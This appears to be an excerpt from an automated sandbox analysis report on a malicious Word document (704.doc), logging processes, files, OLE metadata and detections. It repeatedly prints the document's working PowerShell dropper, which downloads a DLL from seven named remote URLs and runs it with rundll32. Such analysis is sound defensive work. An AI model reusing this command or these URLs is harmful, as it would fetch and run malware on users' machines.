Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .t.e.r.B.i.n.d.i.n.g.E.x.c.e.p.t.i.o.n.....}..v.....*......0.b...............T.....,.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k....8+................7.............}..v.....+......0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................l.k......T...............7.............}..v.....2......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k....83................7.............}..v.....3......0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .n.d.s...I.n.v.o.k.e.E.x.p.r.e.s.s.i.o.n.C.o.m.m.a.n.d.....0.b...............T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k.....8................7.............}..v....09......0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ ........l.k......T...............7.............}..v.....<......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k....x=................7.............}..v.....=......0.b.............h.T.............(...............	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$704.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE407.tmp

Jump to behavior

Source: classification engine

Classification label: mal92.expl.evad.winDOC@5/13@0/0

Source: 704.doc	OLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr	OLE document summary: edited time not present or 0
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp

Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: ~DF59F33552EDE7EF7C.TMP.0.dr

Stream path 'VBA/cvbku3gakuisdgfilu3gblaw' : High number of string operations

Obfuscated command line found

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
